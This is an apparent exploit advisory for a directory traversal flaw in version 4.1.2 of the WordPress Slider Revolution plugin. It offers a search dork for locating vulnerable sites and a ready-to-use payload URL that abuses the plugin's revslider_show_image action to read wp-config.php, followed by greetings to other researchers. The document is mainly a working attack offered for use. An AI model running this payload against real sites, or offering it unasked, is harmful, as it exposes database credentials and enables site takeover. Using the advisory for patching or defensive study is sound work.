WordPress Slider Revolution plugin version 4.1.2 suffers from a directory traversal vulnerability.
d3b71e6cca26b526cd8c1ef3f9be1a645c838d5b2349fa4c8be240892908d108====================================================================================================================================
| # Title : WordPress - Slider Revolution 4.1.2 Directory Traversal Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit) |
| # Vendor : https://www.sliderrevolution.com/ |
| # Dork : index off revslider\backup |
====================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] Use payload : /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
[+] http://127.0.0.1/langparkmedicalcentrecomau/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
Greetings to :=========================================================================================================================
|
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg |
|
=======================================================================================================================================